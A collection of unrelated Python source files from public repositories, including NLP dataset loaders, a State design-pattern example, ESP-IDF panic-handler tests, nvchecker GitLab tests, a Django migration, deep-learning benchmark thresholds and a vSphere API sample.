return BIG_URLS[name][3](filepath, **kwargs)
if filepathlow.endswith('.w2v.txt'):
try:
return KeyedVectors.load_word2vec_format(filepath, binary=False, limit=nrows)
except (TypeError, UnicodeError):
pass
if filepathlow.endswith('.w2v.bin') or filepathlow.endswith('.bin.gz') or filepathlow.endswith('.w2v.bin.gz'):
try:
return KeyedVectors.load_word2vec_format(filepath, binary=True, limit=nrows)
except (TypeError, UnicodeError):
pass
if filepathlow.endswith('.gz'):
try:
filepath = ensure_open(filepath)
except: # noqa
pass
if re.match(r'.json([.][a-z]{0,3}){0,2}', filepathlow):
return read_json(filepath)
if filepathlow.endswith('.tsv.gz') or filepathlow.endswith('.tsv'):
try:
return pd.read_table(filepath)
except: # noqa
pass
if filepathlow.endswith('.csv.gz') or filepathlow.endswith('.csv'):
try:
return read_csv(filepath)
except: # noqa
pass
if filepathlow.endswith('.txt'):
try:
return read_text(filepath)
except (TypeError, UnicodeError):
pass
return filepaths[name]
elif name in DATASET_NAME2FILENAME:
return read_named_csv(name, nrows=nrows)
elif name in DATA_NAMES:
return read_named_csv(DATA_NAMES[name], nrows=nrows)
elif os.path.isfile(name):
return read_named_csv(name, nrows=nrows)
elif os.path.isfile(os.path.join(DATA_PATH, name)):
return read_named_csv(os.path.join(DATA_PATH, name), nrows=nrows)
msg = 'Unable to find dataset "{}"" in {} or {} (*.csv.gz, *.csv, *.json, *.zip, or *.txt)\n'.format(
name, DATA_PATH, BIGDATA_PATH)
msg += 'Available dataset names include:\n{}'.format('\n'.join(DATASET_NAMES))
log.error(msg)
raise IOError(msg)
def multifile_dataframe(paths=['urbanslang{}of4.csv'.format(i) for i in range(1, 5)], header=0, index_col=None):
"""Like pandas.read_csv, but loads and concatenates (df.append(df)s) DataFrames together"""
df = pd.DataFrame()
for p in paths:
df = df.append(read_csv(p, header=header, index_col=index_col), ignore_index=True if not index_col else False)
if index_col and df.index.name == index_col:
del df[index_col]
return df
def get_wikidata_qnum(wikiarticle, wikisite):
"""Retrieve the Query number for a wikidata database of metadata about a particular article
>>> print(get_wikidata_qnum(wikiarticle="Andromeda Galaxy", wikisite="enwiki"))
Q2469
"""
resp = requests_get('https://www.wikidata.org/w/api.php', timeout=5, params={
'action': 'wbgetentities',
'titles': wikiarticle,
'sites': wikisite,
'props': '',
'format': 'json'
}).json()
return list(resp['entities'])[0]
DATASET_FILENAMES = [f['name'] for f in find_files(DATA_PATH, ext='.csv.gz', level=0)]
DATASET_FILENAMES += [f['name'] for f in find_files(DATA_PATH, ext='.csv', level=0)]
DATASET_FILENAMES += [f['name'] for f in find_files(DATA_PATH, ext='.json', level=0)]
DATASET_FILENAMES += [f['name'] for f in find_files(DATA_PATH, ext='.txt', level=0)]
DATASET_NAMES = [
f[:-4] if f.endswith('.csv') else f for f in [os.path.splitext(f)[0] for f in DATASET_FILENAMES]]
DATASET_NAME2FILENAME = dict(sorted(zip(DATASET_NAMES, DATASET_FILENAMES)))
def str2int(s):
s = ''.join(c for c in s if c in '0123456789')
return int(s or INT_MIN)
def clean_toxoplasmosis(url='http://www.rightdiagnosis.com/t/toxoplasmosis/stats-country.htm'):
dfs = pd.read_html('http://www.rightdiagnosis.com/t/toxoplasmosis/stats-country.htm', header=0)
df = dfs[0].copy()
df.columns = normalize_column_names(df.columns)
df = df.dropna().copy()
df['extrapolated_prevalence'] = df['extrapolated_prevalence'].apply(str2int)
df['population_estimated_used'] = df['population_estimated_used'].apply(str2int)
df['frequency'] = df.extrapolated_prevalence.astype(float) / df.population_estimated_used
return df
def normalize_column_names(df):
r""" Clean up whitespace in column names. See better version at `pugnlp.clean_columns`
>>> df = pd.DataFrame([[1, 2], [3, 4]], columns=['Hello World', 'not here'])
>>> normalize_column_names(df)
['hello_world', 'not_here']
"""
columns = df.columns if hasattr(df, 'columns') else df
columns = [c.lower().replace(' ', '_') for c in columns]
return columns
def clean_column_values(df, inplace=True):
r""" Convert dollar value strings, numbers with commas, and percents into floating point values
>>> df = get_data('us_gov_deficits_raw')
>>> df2 = clean_column_values(df, inplace=False)
>>> df2.iloc[0]
Fiscal year 10/2017-3/2018
President's party R
Senate majority party R
House majority party R
Top-bracket marginal income tax rate 38.3
National debt millions 2.10896e+07
National debt millions of 1983 dollars 8.47004e+06
Deficit\n(millions of 1983 dollars) 431443
Surplus string in 1983 dollars NaN
Deficit string in 1983 dollars ($ = $10B) $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Net surplus in 1983 dollars ($B) -430
Name: 0, dtype: object
"""
dollars_percents = re.compile(r'[%$,;\s]+')
if not inplace:
df = df.copy()
for c in df.columns:
values = None
if df[c].dtype.char in '<U S O'.split():
try:
values = df[c].copy()
values = values.fillna('')
values = values.astype(str).str.replace(dollars_percents, '')
# values = values.str.strip().str.replace(dollars_percents, '').str.strip()
if values.str.len().sum() > .2 * df[c].astype(str).str.len().sum():
values[values.isnull()] = np.nan
values[values == ''] = np.nan
values = values.astype(float)
except ValueError:
values = None
except: # noqa
log.error('Error on column {} with dtype {}'.format(c, df[c].dtype))
raise
if values is not None:
if values.isnull().sum() < .6 * len(values) and values.any():
df[c] = values
return df
def load_geonames(filepath='http://download.geonames.org/export/dump/cities1000.zip'):
"""Clean the table of city metadata from download.geoname.org/export/dump/{filename}
Reference:
http://download.geonames.org/export/dump/readme.txt
'cities1000.txt' and 'allCountries.txt' have the following tab-separated fields:
0 geonameid : integer id of record in geonames database
1 name : name of geographical point (utf8) varchar(200)
2 asciiname : name of geographical point in plain ascii characters, varchar(200)
3 alternatenames : alternatenames, comma separated, ascii names automatically transliterated,
convenience attribute from alternatename table, varchar(10000)
4 latitude : latitude in decimal degrees (wgs84)
5 longitude : longitude in decimal degrees (wgs84)
6 feature class : see http://www.geonames.org/export/codes.html, char(1)
7 feature code : see http://www.geonames.org/export/codes.html, varchar(10)
8 country code : ISO-3166 2-letter country code, 2 characters
9 cc2 : alternate country codes, comma separated, ISO-3166 2-letter country code, 200 characters
10 admin1 code : fipscode (subject to change to iso code), see exceptions below,
see file admin1Codes.txt for display names of this code; varchar(20)
11 admin2 code : code for the second administrative division, a county in the US,
see file admin2Codes.txt; varchar(80)
12 admin3 code : code for third level administrative division, varchar(20)
13 admin4 code : code for fourth level administrative division, varchar(20)
14 population : bigint (8 byte int)
15 elevation : in meters, integer
16 dem : digital elevation model, srtm3 or gtopo30, average elevation of
(3''x3''ca 90mx90m) or 30''x30''(ca 900mx900m) area in meters, integer.
srtm processed by cgiar/ciat.
17 timezone : the iana timezone id (see file timeZone.txt) varchar(40)
18 modification date : date of last modification in yyyy-MM-dd format
"""
columns = ['geonameid', 'name', 'asciiname', 'alternatenames', 'latitude', 'longitude', 'feature class',
'feature code', 'country code']
columns += ['cc2', 'admin1_code', 'admin2_code', 'admin3_code', 'admin4_code', 'population', 'elevation',
'dem', 'timezone', 'modification date']
columns = normalize_column_names(columns)
df = pd.read_csv(filepath, sep='\t', index_col=None, low_memory=False, header=None)
df.columns = columns
return df
def load_geo_adwords(filename='AdWords API Location Criteria 2017-06-26.csv.gz'):
""" WARN: Not a good source of city names. This table has many errors, even after cleaning"""
df = pd.read_csv(filename, header=0, index_col=0, low_memory=False)
df.columns = [c.replace(' ', '_').lower() for c in df.columns]
canonical = pd.DataFrame([list(row) for row in df.canonical_name.str.split(',').values])
def cleaner(row):
cleaned = np.array(
[s for i, s in enumerate(row.values) if s not in ('Downtown', None) and (i > 3 or row[i + 1] != s)])
if len(cleaned) == 2:
cleaned = [cleaned[0], None, cleaned[1], None, None]
else:
cleaned = list(cleaned) + [None] * (5 - len(cleaned))
if not np.all(np.array(row.values)[:3] == np.array(cleaned)[:3]):
log.info('{} => {}'.format(row.values, cleaned))
return list(cleaned)
cleancanon = canonical.apply(cleaner, axis=1)
cleancanon.columns = 'city region country extra extra2'.split()
df['region'] = cleancanon.region
df['country'] = cleancanon.country
return df
def clean_cornell_movies(filename='cornell_movie_dialogs_corpus.zip', subdir='cornell movie-dialogs corpus'):
""" Load a dataframe of ~100k raw (uncollated) movie lines from the cornell movies dialog corpus
>>> local_filepath = download_file(BIG_URLS['cornell_movie_dialogs_corpus'][0])
>>> df = clean_cornell_movies(filename='cornell_movie_dialogs_corpus.zip')
>>> df.describe(include='all')
user movie person utterance
count 304713 304713 304713 304446
unique 9035 617 5356 265783
top u4525 m289 JACK What?
freq 537 1530 3032 1684
"""
fullpath_zipfile = find_filepath(filename)
dirname = os.path.basename(filename)
subdir = 'cornell movie-dialogs corpus'
if fullpath_zipfile.lower().endswith('.zip'):
retval = unzip(fullpath_zipfile)
log.debug(f'unzip({fullpath_zipfile}) return value: {retval}')
dirname = dirname[:-4]
fullpath_movie_lines = os.path.join(BIGDATA_PATH, dirname, subdir, 'movie_lines.txt')
dialog = pd.read_csv(
fullpath_movie_lines, sep=r'\+\+\+\$\+\+\+', engine='python', header=None, index_col=0)
dialog.columns = 'user movie person utterance'.split()
dialog.index.name = 'line'
dialog.index = [int(s.strip()[1:]) for s in dialog.index.values]
dialog.sort_index(inplace=True)
for col in dialog.columns:
dialog[col] = dialog[col].str.strip()
return dialog
def isglove(filepath):
""" Get the first word vector in a GloVE file and return its dimensionality or False if not a vector
>>> isglove(os.path.join(DATA_PATH, 'cats_and_dogs.txt'))
False
"""
with ensure_open(filepath, 'r') as f:
header_line = f.readline()
vector_line = f.readline()
try:
num_vectors, num_dim = header_line.split()
return int(num_dim)
except (ValueError, TypeError):
pass
vector = vector_line.split()[1:]
if len(vector) % 10:
print(vector)
print(len(vector) % 10)
return False
try:
vector = np.array([float(x) for x in vector])
except (ValueError, TypeError):
return False
if np.all(np.abs(vector) < 12.):
return len(vector)
return False
def nlp(texts, lang='en', linesep=None, verbose=True):
r""" Use the SpaCy parser to parse and tag natural language strings.
Load the SpaCy parser language model lazily and share it among all nlpia modules.
Probably unnecessary, since SpaCy probably takes care of this with `spacy.load()`
>>> doc = nlp("Domo arigatto Mr. Roboto.")
>>> doc.text
'Domo arigatto Mr. Roboto.'
>>> doc.ents
(Roboto,)
>>> docs = nlp("Hey Mr. Tangerine Man!\nPlay a song for me.\n", linesep='\n')
>>> doc = docs[0]
>>> [t for t in doc]
[Hey, Mr., Tangerine, Man, !]
>>> [tok.text for tok in doc]
['Hey', 'Mr.', 'Tangerine', 'Man', '!']
>>> [(tok.text, tok.tag_) for tok in doc]
[('Hey', 'UH'),
('Mr.', 'NNP'),
('Tangerine', 'NNP'),
('Man', 'NNP'),
('!', '.')]
>>> [(ent.text, ent.ent_id, ent.has_vector, ent.vector[:3].round(3)) for ent in doc.ents]
[('Tangerine', 0, True, array([0.678, 0.134, 2.162], dtype=float32))]
"""
# doesn't let you load a different model anywhere else in the module
linesep = os.linesep if linesep in ('default', True, 1, 'os') else linesep
tqdm_prog = no_tqdm if (not verbose or (hasattr(texts, '__len__') and len(texts) < 3)) else tqdm
global _parse
if not _parse:
try:
_parse = spacy.load(lang)
except (OSError, IOError):
try:
spacy.cli.download(lang)
except URLError:
log.warning("Unable to download Spacy language model '{}' so nlp(text) just returns text.split()".format(lang))
parse = _parse or str.split
# TODO: reverse this recursion (str first then sequence) to allow for sequences of sequences of texts
if isinstance(texts, str):
if linesep:
return nlp(texts.split(linesep))
else:
return nlp([texts])
if hasattr(texts, '__len__'):
if len(texts) == 1:
return parse(texts[0])
elif len(texts) > 1:
return [(parse or str.split)(text) for text in tqdm_prog(texts)]
else:
return None
else:
# return generator if sequence of strings doesn't have __len__ which means its an iterable or generator itself
return (parse(text) for text in tqdm_prog(texts))
# TODO: return the same type as the input, e.g. `type(texts)(texts)`
def clean_win_tsv(filepath=os.path.join(DATA_PATH, 'Products.txt'),
index_col=False, sep='\t', lineterminator='\r', error_bad_lines=False, **kwargs):
""" Load and clean tab-separated files saved on Windows OS ('\r\n') """
df = pd.read_csv(filepath, index_col=index_col, sep=sep, lineterminator=lineterminator,
error_bad_lines=error_bad_lines, **kwargs)
index_col = df.columns[0]
original_len = len(df)
if df[index_col].values[-1] == '\n':
df.iloc[-1, 0] = np.nan
original_len = len(df) - 1
df.dropna(how='all', inplace=True)
df[index_col] = df[index_col].str.strip().apply(lambda x: x if x else str(INT_MIN)).astype(int)
df = df[~(df[index_col] == INT_NAN)]
df.set_index(index_col, inplace=True)
if len(df) != original_len:
log.warning(('Loaded {} rows from tsv. Original file, "{}", contained {} seemingly valid lines.' +
'Index column: {}').format(len(df), original_len, filepath, index_col))
return df
|
Chapter09/state_2.py
|
shoshan/Clean-Code-in-Python
| 402 |
66943
|
"""Clean Code in Python - Chapter 9: Common Design Patterns
> State
"""
import abc
from log import logger
from state_1 import InvalidTransitionError
class MergeRequestState(abc.ABC):
def __init__(self, merge_request):
self._merge_request = merge_request
@abc.abstractmethod
def open(self):
...
@abc.abstractmethod
def close(self):
...
@abc.abstractmethod
def merge(self):
...
def __str__(self):
return self.__class__.__name__
class Open(MergeRequestState):
def open(self):
self._merge_request.approvals = 0
def close(self):
self._merge_request.approvals = 0
self._merge_request.state = Closed
def merge(self):
logger.info("merging %s", self._merge_request)
logger.info("deleting branch %s", self._merge_request.source_branch)
self._merge_request.state = Merged
class Closed(MergeRequestState):
def open(self):
logger.info("reopening closed merge request %s", self._merge_request)
self._merge_request.state = Open
def close(self):
"""Current state."""
def merge(self):
raise InvalidTransitionError("can't merge a closed request")
class Merged(MergeRequestState):
def open(self):
raise InvalidTransitionError("already merged request")
def close(self):
raise InvalidTransitionError("already merged request")
def merge(self):
"""Current state."""
class MergeRequest:
def __init__(self, source_branch: str, target_branch: str) -> None:
self.source_branch = source_branch
self.target_branch = target_branch
self._state: MergeRequestState
self.approvals = 0
self.state = Open
@property
def state(self):
return self._state
@state.setter
def state(self, new_state_cls):
self._state = new_state_cls(self)
@property
def status(self):
return str(self.state)
def __getattr__(self, method):
return getattr(self.state, method)
def __str__(self):
return f"{self.target_branch}:{self.source_branch}"
|
tools/test_apps/system/panic/app_test.py
|
lovyan03/esp-idf
| 8,747 |
66953
|
#!/usr/bin/env python
import sys
import panic_tests as test
from test_panic_util.test_panic_util import panic_test, run_all
# test_task_wdt
@panic_test(target=['ESP32', 'ESP32S2'])
def test_panic_task_wdt(env, _extra_data):
test.task_wdt_inner(env, 'panic')
@panic_test()
def test_coredump_task_wdt_uart_elf_crc(env, _extra_data):
test.task_wdt_inner(env, 'coredump_uart_elf_crc')
@panic_test()
def test_coredump_task_wdt_uart_bin_crc(env, _extra_data):
test.task_wdt_inner(env, 'coredump_uart_bin_crc')
@panic_test()
def test_coredump_task_wdt_flash_elf_sha(env, _extra_data):
test.task_wdt_inner(env, 'coredump_flash_elf_sha')
@panic_test()
def test_coredump_task_wdt_flash_bin_crc(env, _extra_data):
test.task_wdt_inner(env, 'coredump_flash_bin_crc')
@panic_test()
def test_gdbstub_task_wdt(env, _extra_data):
test.task_wdt_inner(env, 'gdbstub')
# test_int_wdt
@panic_test()
def test_panic_int_wdt(env, _extra_data):
test.int_wdt_inner(env, 'panic')
@panic_test()
def test_coredump_int_wdt_uart_elf_crc(env, _extra_data):
test.int_wdt_inner(env, 'coredump_uart_elf_crc')
@panic_test()
def test_coredump_int_wdt_uart_bin_crc(env, _extra_data):
test.int_wdt_inner(env, 'coredump_uart_bin_crc')
@panic_test()
def test_coredump_int_wdt_flash_elf_sha(env, _extra_data):
test.int_wdt_inner(env, 'coredump_flash_elf_sha')
@panic_test()
def test_coredump_int_wdt_flash_bin_crc(env, _extra_data):
test.int_wdt_inner(env, 'coredump_flash_bin_crc')
@panic_test()
def test_gdbstub_int_wdt(env, _extra_data):
test.int_wdt_inner(env, 'gdbstub')
# test_int_wdt_cache_disabled
@panic_test()
def test_panic_int_wdt_cache_disabled(env, _extra_data):
test.int_wdt_cache_disabled_inner(env, 'panic')
@panic_test()
def test_coredump_int_wdt_cache_disabled_uart_elf_crc(env, _extra_data):
test.int_wdt_cache_disabled_inner(env, 'coredump_uart_elf_crc')
@panic_test()
def test_coredump_int_wdt_cache_disabled_uart_bin_crc(env, _extra_data):
test.int_wdt_cache_disabled_inner(env, 'coredump_uart_bin_crc')
@panic_test()
def test_coredump_int_wdt_cache_disabled_flash_elf_sha(env, _extra_data):
test.int_wdt_cache_disabled_inner(env, 'coredump_flash_elf_sha')
@panic_test()
def test_coredump_int_wdt_cache_disabled_flash_bin_crc(env, _extra_data):
test.int_wdt_cache_disabled_inner(env, 'coredump_flash_bin_crc')
@panic_test()
def test_gdbstub_int_wdt_cache_disabled(env, _extra_data):
test.int_wdt_cache_disabled_inner(env, 'gdbstub')
# test_cache_error
@panic_test()
def test_panic_cache_error(env, _extra_data):
test.cache_error_inner(env, 'panic')
@panic_test()
def test_coredump_cache_error_uart_elf_crc(env, _extra_data):
test.cache_error_inner(env, 'coredump_uart_elf_crc')
@panic_test()
def test_coredump_cache_error_uart_bin_crc(env, _extra_data):
test.cache_error_inner(env, 'coredump_uart_bin_crc')
@panic_test()
def test_coredump_cache_error_flash_elf_sha(env, _extra_data):
test.cache_error_inner(env, 'coredump_flash_elf_sha')
@panic_test()
def test_coredump_cache_error_flash_bin_crc(env, _extra_data):
test.cache_error_inner(env, 'coredump_flash_bin_crc')
@panic_test()
def test_gdbstub_cache_error(env, _extra_data):
test.cache_error_inner(env, 'gdbstub')
# test_stack_overflow
@panic_test(target=['ESP32', 'ESP32S2'])
def test_panic_stack_overflow(env, _extra_data):
test.stack_overflow_inner(env, 'panic')
@panic_test()
def test_coredump_stack_overflow_uart_elf_crc(env, _extra_data):
test.stack_overflow_inner(env, 'coredump_uart_elf_crc')
@panic_test()
def test_coredump_stack_overflow_uart_bin_crc(env, _extra_data):
test.stack_overflow_inner(env, 'coredump_uart_bin_crc')
@panic_test()
def test_coredump_stack_overflow_flash_elf_sha(env, _extra_data):
test.stack_overflow_inner(env, 'coredump_flash_elf_sha')
@panic_test()
def test_coredump_stack_overflow_flash_bin_crc(env, _extra_data):
test.stack_overflow_inner(env, 'coredump_flash_bin_crc')
@panic_test()
def test_gdbstub_stack_overflow(env, _extra_data):
test.stack_overflow_inner(env, 'gdbstub')
# test_instr_fetch_prohibited
@panic_test(target=['ESP32', 'ESP32S2'])
def test_panic_instr_fetch_prohibited(env, _extra_data):
test.instr_fetch_prohibited_inner(env, 'panic')
@panic_test()
def test_coredump_instr_fetch_prohibited_uart_elf_crc(env, _extra_data):
test.instr_fetch_prohibited_inner(env, 'coredump_uart_elf_crc')
@panic_test()
def test_coredump_instr_fetch_prohibited_uart_bin_crc(env, _extra_data):
test.instr_fetch_prohibited_inner(env, 'coredump_uart_bin_crc')
@panic_test()
def test_coredump_instr_fetch_prohibited_flash_elf_sha(env, _extra_data):
test.instr_fetch_prohibited_inner(env, 'coredump_flash_elf_sha')
@panic_test()
def test_coredump_instr_fetch_prohibited_flash_bin_crc(env, _extra_data):
test.instr_fetch_prohibited_inner(env, 'coredump_flash_bin_crc')
@panic_test()
def test_gdbstub_instr_fetch_prohibited(env, _extra_data):
test.instr_fetch_prohibited_inner(env, 'gdbstub')
# test_illegal_instruction
@panic_test(target=['ESP32', 'ESP32S2'])
def test_panic_illegal_instruction(env, _extra_data):
test.illegal_instruction_inner(env, 'panic')
@panic_test()
def test_coredump_illegal_instruction_uart_elf_crc(env, _extra_data):
test.illegal_instruction_inner(env, 'coredump_uart_elf_crc')
@panic_test()
def test_coredump_illegal_instruction_uart_bin_crc(env, _extra_data):
test.illegal_instruction_inner(env, 'coredump_uart_bin_crc')
@panic_test()
def test_coredump_illegal_instruction_flash_elf_sha(env, _extra_data):
test.illegal_instruction_inner(env, 'coredump_flash_elf_sha')
@panic_test()
def test_coredump_illegal_instruction_flash_bin_crc(env, _extra_data):
test.illegal_instruction_inner(env, 'coredump_flash_bin_crc')
@panic_test()
def test_gdbstub_illegal_instruction(env, _extra_data):
test.illegal_instruction_inner(env, 'gdbstub')
# test_storeprohibited
@panic_test(target=['ESP32', 'ESP32S2'])
def test_panic_storeprohibited(env, _extra_data):
test.storeprohibited_inner(env, 'panic')
@panic_test()
def test_coredump_storeprohibited_uart_elf_crc(env, _extra_data):
test.storeprohibited_inner(env, 'coredump_uart_elf_crc')
@panic_test()
def test_coredump_storeprohibited_uart_bin_crc(env, _extra_data):
test.storeprohibited_inner(env, 'coredump_uart_bin_crc')
@panic_test()
def test_coredump_storeprohibited_flash_elf_sha(env, _extra_data):
test.storeprohibited_inner(env, 'coredump_flash_elf_sha')
@panic_test()
def test_coredump_storeprohibited_flash_bin_crc(env, _extra_data):
test.storeprohibited_inner(env, 'coredump_flash_bin_crc')
@panic_test()
def test_gdbstub_storeprohibited(env, _extra_data):
test.storeprohibited_inner(env, 'gdbstub')
# test_abort
@panic_test(target=['ESP32', 'ESP32S2'])
def test_panic_abort(env, _extra_data):
test.abort_inner(env, 'panic')
@panic_test(target=['ESP32'])
def test_panic_abort_cache_disabled(env, _extra_data):
test.abort_cached_disabled_inner(env, 'panic')
@panic_test()
def test_coredump_abort_uart_elf_crc(env, _extra_data):
test.abort_inner(env, 'coredump_uart_elf_crc')
@panic_test()
def test_coredump_abort_uart_bin_crc(env, _extra_data):
test.abort_inner(env, 'coredump_uart_bin_crc')
@panic_test()
def test_coredump_abort_flash_elf_sha(env, _extra_data):
test.abort_inner(env, 'coredump_flash_elf_sha')
@panic_test()
def test_coredump_abort_flash_bin_crc(env, _extra_data):
test.abort_inner(env, 'coredump_flash_bin_crc')
@panic_test()
def test_gdbstub_abort(env, _extra_data):
test.abort_inner(env, 'gdbstub')
# test_assert
@panic_test(target=['ESP32', 'ESP32S2'])
def test_panic_assert(env, _extra_data):
test.assert_inner(env, 'panic')
@panic_test(target=['ESP32'])
def test_panic_assert_cache_disabled(env, _extra_data):
test.assert_cached_disabled_inner(env, 'panic')
# test_ub
@panic_test()
def test_panic_ub(env, _extra_data):
test.ub_inner(env, 'panic')
@panic_test()
def test_coredump_ub_uart_elf_crc(env, _extra_data):
test.ub_inner(env, 'coredump_uart_elf_crc')
@panic_test()
def test_coredump_ub_uart_bin_crc(env, _extra_data):
test.ub_inner(env, 'coredump_uart_bin_crc')
@panic_test()
def test_coredump_ub_flash_elf_sha(env, _extra_data):
test.ub_inner(env, 'coredump_flash_elf_sha')
@panic_test()
def test_coredump_ub_flash_bin_crc(env, _extra_data):
test.ub_inner(env, 'coredump_flash_bin_crc')
@panic_test()
def test_gdbstub_ub(env, _extra_data):
test.ub_inner(env, 'gdbstub')
if __name__ == '__main__':
run_all(__file__, sys.argv[1:])
|
tests/test_gitlab.py
|
trathborne/nvchecker
| 320 |
66966
|
<reponame>trathborne/nvchecker<filename>tests/test_gitlab.py
# MIT licensed
# Copyright (c) 2013-2020 lilydjwg <<EMAIL>>, et al.
import pytest
pytestmark = [pytest.mark.asyncio, pytest.mark.needs_net]
async def test_gitlab(get_version):
ver = await get_version("example", {
"source": "gitlab",
"gitlab": "gitlab-org/gitlab-test",
})
assert len(ver) == 8
assert ver.isdigit()
async def test_gitlab_blm(get_version):
# repo with a custom main branch
ver = await get_version("example", {
"source": "gitlab",
"gitlab": "asus-linux/asusctl",
})
assert len(ver) == 8
assert ver.isdigit()
async def test_gitlab_max_tag(get_version):
assert await get_version("example", {
"source": "gitlab",
"gitlab": "gitlab-org/gitlab-test",
"use_max_tag": True,
}) == "v1.1.1"
async def test_gitlab_max_tag_with_include(get_version):
assert await get_version("example", {
"source": "gitlab",
"gitlab": "gitlab-org/gitlab-test",
"use_max_tag": True,
"include_regex": r'v1\.0.*',
}) == "v1.0.0"
async def test_gitlab_max_tag_with_ignored(get_version):
assert await get_version("example", {
"source": "gitlab",
"gitlab": "gitlab-org/gitlab-test",
"use_max_tag": True,
"ignored": "v1.1.0 v1.1.1",
}) == "v1.0.0"
|
orochi/users/migrations/0003_user_services.py
|
garanews/orochi
| 121 |
66981
|
# Generated by Django 3.1 on 2020-08-05 13:09
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('website', '0012_service'),
('users', '0002_alter_user_first_name'),
]
operations = [
migrations.AddField(
model_name='user',
name='services',
field=models.ManyToManyField(to='website.Service'),
),
]
|
src/benchmark_metrics.py
|
Yixiao99/deep-learning-containers
| 383 |
66998
|
<filename>src/benchmark_metrics.py
from packaging.specifiers import SpecifierSet
from packaging.version import Version
# TensorFlow
# Throughput, unit: images/second
TENSORFLOW_TRAINING_CPU_SYNTHETIC_THRESHOLD = {"<2.0": 50, ">=2.0": 50}
TENSORFLOW_TRAINING_GPU_SYNTHETIC_THRESHOLD = {"<2.0": 5000, ">=2.0": 7000}
TENSORFLOW_TRAINING_GPU_IMAGENET_THRESHOLD = {"<2.0": 5000, ">=2.0": 7000}
# p99 latency, unit: second
TENSORFLOW_INFERENCE_CPU_THRESHOLD = {
"<2.0": {
"INCEPTION": 0.06, "RCNN-Resnet101-kitti": 0.65, "Resnet50v2": 0.35, "MNIST": 0.00045, "SSDResnet50Coco": 0.4,
},
">=2.0,<2.4": {
"INCEPTION": 0.06, "RCNN-Resnet101-kitti": 0.65, "Resnet50v2": 0.35, "MNIST": 0.00045, "SSDResnet50Coco": 0.4,
},
# Updated thresholds for TF 2.4.1 CPU from Vanilla TF 2.4
">=2.4": {
"INCEPTION": 0.11, "RCNN-Resnet101-kitti": 2.1, "Resnet50v2": 0.35, "MNIST": 0.001, "SSDResnet50Coco": 1.2,
},
}
TENSORFLOW_INFERENCE_GPU_THRESHOLD = {
"<2.0": {
"INCEPTION": 0.04, "RCNN-Resnet101-kitti": 0.06, "Resnet50v2": 0.014, "MNIST": 0.0024, "SSDResnet50Coco": 0.1,
},
">=2.0": {
"INCEPTION": 0.04, "RCNN-Resnet101-kitti": 0.06, "Resnet50v2": 0.014, "MNIST": 0.0024, "SSDResnet50Coco": 0.1,
},
}
# Throughput, unit: images/second
TENSORFLOW_SM_TRAINING_CPU_1NODE_THRESHOLD = {">=2.0": 30}
TENSORFLOW_SM_TRAINING_CPU_4NODE_THRESHOLD = {">=2.0": 20}
TENSORFLOW_SM_TRAINING_GPU_1NODE_THRESHOLD = {">=2.0": 2500}
TENSORFLOW_SM_TRAINING_GPU_4NODE_THRESHOLD = {">=2.0": 2500}
# MXNet
# Throughput, unit: images/second
MXNET_TRAINING_CPU_CIFAR_THRESHOLD = {">=1.0": 1000}
MXNET_TRAINING_GPU_IMAGENET_THRESHOLD = {">=1.0": 4500}
MXNET_INFERENCE_CPU_IMAGENET_THRESHOLD = {">=1.0": 100}
MXNET_INFERENCE_GPU_IMAGENET_THRESHOLD = {">=1.0": 4500}
# Accuracy, unit: NA
MXNET_TRAINING_GPU_IMAGENET_ACCURACY_THRESHOLD = {">=1.0": 0.9}
# Latency, unit: sec/epoch
MXNET_TRAINING_GPU_IMAGENET_LATENCY_THRESHOLD = {">=1.0": 120}
# PyTorch
# Throughput, unit: images/second
PYTORCH_TRAINING_GPU_SYNTHETIC_THRESHOLD = {">=1.0": 2400}
# Training Time Cost, unit: second/epoch
PYTORCH_TRAINING_GPU_IMAGENET_THRESHOLD = {">=1.0": 660}
# p99 latency, unit: millisecond
PYTORCH_INFERENCE_CPU_THRESHOLD = {
">=1.0": {
"ResNet18": 0.08,
"VGG13": 0.45,
"MobileNetV2": 0.06,
"GoogleNet": 0.12,
"DenseNet121": 0.15,
"InceptionV3": 0.25,
}
}
PYTORCH_INFERENCE_GPU_THRESHOLD = {
">=1.0": {
"ResNet18": 0.0075,
"VGG13": 0.004,
"MobileNetV2": 0.013,
"GoogleNet": 0.018,
"DenseNet121": 0.04,
"InceptionV3": 0.03,
}
}
def get_threshold_for_image(framework_version, lookup_table):
"""
Find the correct threshold value(s) for a given framework version and a dict from which to lookup values.
:param framework_version: Framework version of the image being tested
:param lookup_table: The relevant dict from one of the dicts defined in this script
:return: Threshold value as defined by one of the dicts in this script
"""
for spec, threshold_val in lookup_table.items():
if Version(framework_version) in SpecifierSet(spec):
return threshold_val
raise KeyError(
f"{framework_version} does not satisfy any version constraint available in "
f"{lookup_table.keys()}"
)
|
h2o-docs/src/booklets/v2_2015/source/GBM_Vignette_code_examples/gbm_uploadfile_example.py
|
ahmedengu/h2o-3
| 6,098 |
67010
|
<gh_stars>1000+
import h2o
h2o.init()
weather_hex = h2o.import_file("http://h2o-public-test-data.s3.amazonaws.com/smalldata/junit/weather.csv")
# Get a summary of the data
weather_hex.describe()
|
samples/vsphere/vcenter/topologysvc/list_replication_status.py
|
JKraftman/vsphere-automation-sdk-python
| 589 |
67033
|
#!/usr/bin/env python
"""
* *******************************************************
* Copyright (c) VMware, Inc. 2020. All Rights Reserved.
* SPDX-License-Identifier: MIT
* *******************************************************
*
* DISCLAIMER. THIS PROGRAM IS PROVIDED TO YOU "AS IS" WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, WHETHER ORAL OR WRITTEN,
* EXPRESS OR IMPLIED. THE AUTHOR SPECIFICALLY DISCLAIMS ANY IMPLIED
* WARRANTIES OR CONDITIONS OF MERCHANTABILITY, SATISFACTORY QUALITY,
* NON-INFRINGEMENT AND FITNESS FOR A PARTICULAR PURPOSE.
"""
__author__ = 'VMware, Inc.'
__vcenter_version__ = '7.0+'
from vmware.vapi.vsphere.client import create_vsphere_client
from samples.vsphere.common import (sample_cli, sample_util)
from samples.vsphere.common.ssl_helper import get_unverified_session
"""
Description: Demonstrates listing of the vCenter Server or Platform service
controller node's information in Link Mode in an SSO Domain.
Sample Prerequisites:
- The user invoking the API should have the System.Read privilege.
"""
parser = sample_cli.build_arg_parser()
args = sample_util.process_cli_args(parser.parse_args())
session = get_unverified_session() if args.skipverification else None
# Login to vCenter
vsphere_client = create_vsphere_client(server=args.server,
username=args.username,
password=args.password,
session=session)
print(vsphere_client.vcenter.topology.ReplicationStatus.list())
|
